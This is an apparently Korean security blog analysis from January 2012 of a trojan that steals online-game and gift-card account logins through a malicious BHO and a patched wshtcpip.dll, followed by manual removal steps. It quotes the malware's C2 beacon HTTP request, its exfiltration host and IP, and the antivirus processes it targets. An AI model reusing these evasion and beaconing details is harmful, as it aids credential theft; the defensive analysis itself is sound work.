▷ version.dll + safemon.dll 파일을 이용한 계정 정보 수집 악성코드 주의 (2012.1.17)
이는 기존의 version.dll + safemon.dll 유포 방식에서 변화를 준 형태로 이전에 작성한 분석 내용을 함께 참고하시기 바랍니다.
이를 통해 최종적으로 감염시키는 실행 파일(MD5 : c752fcd1e8767802012c1aacd2effe5c)에 대하여 avast! 보안 제품에서는 Win32:FrePack [Cryp] (VirusTotal : 17/43), 안철수연구소(AhnLab) V3 보안 제품에서는 ASD.Prevention 진단명으로 진단되고 있습니다.
GET /2/get.asp?mac=1A1B ~(생략)~ 2047&ver=winxp%20Professional&avs=(V3)&os=NO. HTTP/1.1
User-Agent: Google page
Host: get.trowew.com
Cache-Control: no-cache
※ 네이버 백신(Naver Vaccine)은 체크하지 않은 상태(unknow)로 전송됩니다.
테스트에서는 AhnLab V3 보안 제품의 경우 자체 보호 기능이 활성화된 경우에도 최종 실행 파일을 진단하지 못할 경우에는 백신이 종료되는 현상이 확인되었습니다.
최종 실행 파일을 통한 감염 과정을 간단하게 살펴보면 ① "C:\WINDOWS\system32\safemon.dll" 파일을 생성하여 브라우저 도우미 개체(BHO)에 자신을 등록하며 ② 악성 wshtcpip.dll 파일을 생성하기 위한 "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\2012(월일시분초).dll" 파일을 생성합니다.
③ "C:\WINDOWS\system32\wshtcpip.dll" 시스템 파일을 백업하여 "C:\WINDOWS\system32\wshtcpxp.dll" 파일을 생성하며 ④ wshtcpip.dll 시스템 파일은 "C:\WINDOWS\system32\2012(월일시분초).dll" 파일로 이름을 변경합니다.
⑤ 앞서 생성되었던 "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\2012(월일시분초).dll" 파일을 "C:\WINDOWS\system32\wshtcpip.dll" 파일로 패치하여 악성 시스템 파일로 변조한 후 ⑥ "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\ahn.bat" 배치 파일을 생성하여 감염을 시킨 최종 파일과 자신(ahn.bat)을 삭제 처리합니다.
C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\20122415352.dll :: 숨김(H) 속성, 악성 wshtcpip.dll 백업 파일
- MD5 : 7e1ecab4bd463733c1d761d2bb4cdc4c
- Kaspersky : Trojan-GameThief.Win32.OnLineGames.adztc (VirusTotal : 14/43)
※ 해당 파일은 "2012(월일시분초).dll" 형태입니다.
C:\WINDOWS\system32\20122415352.dll :: wshtcpip.dll 백업 파일(정상 파일)
※ 해당 파일은 "2012(월일시분초).dll" 형태입니다.
C:\WINDOWS\system32\safemon.dll :: BHO 등록 파일
- MD5 : 7678d7d1545edf36b611aabd98d98c81
- Kaspersky : Trojan-GameThief.Win32.Magania.gken (VirusTotal : 6/43)
C:\WINDOWS\system32\wshtcpip.dll :: 변경 전 파일 크기(19,456 Bytes) / 변경 후 파일 크기(82,432 Bytes)
- MD5 : 7e1ecab4bd463733c1d761d2bb4cdc4c
- AhnLab V3 : Trojan/Win32.OnLineGames (VirusTotal : 14/43)
C:\WINDOWS\system32\wshtcpxp.dll :: wshtcpip.dll 백업 파일(정상 파일)
1. 악성 "C:\WINDOWS\system32\wshtcpip.dll" 시스템 파일
- AhnLab MyFirewall : aosrts.exe
- AhnLab V3 : MUpdate2.exe, V3LTray.exe, V3LRun.exe, V3LSvc.exe, AhnFlt2k.sys, AhnFltNt.sys, AhnRec2k.sys, AhnRecNt.sys, AhnRghNt.sys, ahnsze.sys, v3core.sys, v3engine.sys
- AhnLab SiteGuard : SgRun.exe, Sgui.exe, SgSvc.exe
- avast! : AvastUI.exe, ashUpd.exe, AvastSvc.exe, avwsc.exe
- AVG : avgupd.exe, avgwdsvc.exe, avgfrw.exe, avgrsx.exe, avgnsx.exe, avgemc.exe, avgam.exe
- Avira AntiVir : avupgsvc.exe, avscan.exe, avguard.exe, avcenter.exe, avgnt.exe
- BitDefender : bdreinit.exe, bdagent.exe, seccenter.exe, vsserv.exe, updatesrv.exe
- ESET NOD32 : ekrn.exe, egui.exe
- Kaspersky : avp.exe
- McAfee : UdaterUI.exe, Mctray.exe, shstat.exe
- MSE : msseces.exe
- Norton : Navw32.exe, ccSvcHst.exe
- 네이버 백신(Naver Vaccine) : NaverAgent.exe
- 알약(ALYac) : AYAgent.aye, AYUpdSrv.aye, AYRTSrv.aye, EstRtw.sys
해당 악성 시스템 파일은 국내외 유명 보안 제품의 프로세스를 감시하여 정상적인 동작을 방해하는 기능이 포함되어 있는 것을 확인할 수 있습니다.
2. "C:\WINDOWS\system32\safemon.dll" 파일 기능
safemon.dll 악성 파일은 safemon Module 파일로 등록되어 있으며, 감염시 브라우저 도우미 개체(BHO)에 자신을 등록합니다.
이 과정에서 감염 전 사용자 PC에 등록된 BHO 정보가 존재할 경우 일괄적으로 삭제 처리하여 감염 후에는 자신만 "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Browser Helper Objects" 레지스트리 값에 추가되는 동작을 확인할 수 있습니다.
이름 : IEHlprObj Class
유형 : 브라우저 도우미 개체
CLSID : {D36F9CA2-788F-42DE-A627-9E6EF40D8475}
파일 : C:\WINDOWS\system32\safemon.dll
※ AhnLab V3 보안 제품에서는 "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Browser Helper Objects\{D36F9CA2-788F-42DE-A627-9E6EF40D8475}" 값에 대하여 Suspicious BHO 진단명으로 진단되고 있습니다.
이를 통해 safemon.dll 파일은 Internet Explorer 웹 브라우저가 실행될 경우 iexplore.exe 프로세스에 자신을 추가하여 다음과 같은 온라인 문화 상품권, 아이템 거래, 온라인 게임 사이트에 접속시 계정 정보를 수집하여 외부에 전송하는 동작을 합니다.
- happymoney.co.kr
- teencash.co.kr
- cultureland.co.kr
- booknlife.com
- capogames.net
- dragonnest.nexon.com
- elsword.nexon.com
- clubaudition.ndolfin.com
- netmarble.net
- itemmania.com
- itembay.com
- pmang.com
- aion.plaync.jp
- plaync.co.kr
- maplestory.nexon.com
- hangame.com
- fifaonline.pmang.com
- df.nexon.com
- baram.nexon.com
실제 틴캐시(TeenCash)에 접속하여 로그인을 시도할 경우 미국(USA)에 위치한 apple.swmlla.com(70.39.81.227) 서버로 계정 아이디(ID), 비밀번호가 전송되는 것을 확인할 수 있습니다.
그러므로 해당 악성코드에 감염된 사용자는 최대한 웹 사이트 로그인 동작을 하지 않은 상태에서 다음과 같은 절차에 따라 수동으로 문제를 해결해 보시기 바랍니다.(※ 반드시 순서를 준수하시기 바라며, 모든 프로그램을 종료한 상태에서 진행하시기 바랍니다.
(1) Internet Explorer 웹 브라우저를 실행하여 추가 기능 관리에 등록된 "IEHlprObj Class" 브라우저 도우미 개체(BHO) 항목을 선택하여 "사용 안 함"으로 변경하시기 바랍니다.(※ 변경 후에는 Internet Explorer 웹 브라우저를 종료하시기 바랍니다.)
(2) "C:\WINDOWS\system32\safemon.dll" 파일 확장자명을 변경하시기 바랍니다.(※ 예시 : safemon.dll-malware)
(3) 레지스트리 편집기(regedit)를 실행하여 다음의 레지스트리 값을 삭제하시기 바랍니다.
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\HOOK_DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\HOOK_ID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IEHlprObj.IEHlprObj
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IEHlprObj.IEHlprObj.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D36F9CA1-788F-42DE-A627-9E6EF40D8475}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{D36F9CA8-788F-42DE-A627-9E6EF40D8475}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Browser Helper Objects\{D36F9CA2-788F-42DE-A627-9E6EF40D8475}
(4) "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\2012(월일시분초).dll" 파일을 삭제하시기 바랍니다.
(5) "C:\WINDOWS\system32\wshtcpip.dll" 파일 확장자명을 변경하시기 바랍니다.(※ 예시 : wshtcpip.dll-malware)
악성 wshtcpip.dll 파일의 확장자명을 변경한 후에는 윈도우 파일 보호(WFP) 기능을 통해 자동으로 wshtcpip.dll 파일이 복원되므로, Windows 탐색기 창을 종료한 후 다시 실행하여 해당 파일(wshtcpip.dll)이 생성되었는지 확인하시기 바랍니다.
만약 wshtcpip.dll 시스템 파일이 복원되지 않은 상태에서 시스템 재부팅을 할 경우 블루 스크린(BSoD) 발생 및 무한 재부팅으로 인해 시스템에 치명적 문제가 발생할 수 있습니다.
(6) 시스템 재부팅 후 다음의 파일을 찾아 수동으로 삭제하시기 바랍니다.
- C:\WINDOWS\system32\2012(월일시분초).dll
- C:\WINDOWS\system32\safemon.dll-malware
- C:\WINDOWS\system32\wshtcpip.dll-malware
- C:\WINDOWS\system32\wshtcpxp.dll
모든 절차가 완료된 후에는 반드시 유명 보안 제품을 이용하여 최신 업데이트를 한 후 정밀 검사를 통해 추가적인 악성 파일이 남아있는지 확인하시기 바랍니다.
해당 악성코드에 감염된 사용자는 자신의 PC가 Windows 보안 업데이트 미적용, Adobe Flash Player 구 버전 사용, Oracle JRE 구 버전 사용으로 인한 문제로 감염이 된 것이므로 반드시 최신 업데이트를 통해 보안 패치를 하시고 인터넷을 이용하시기 바랍니다.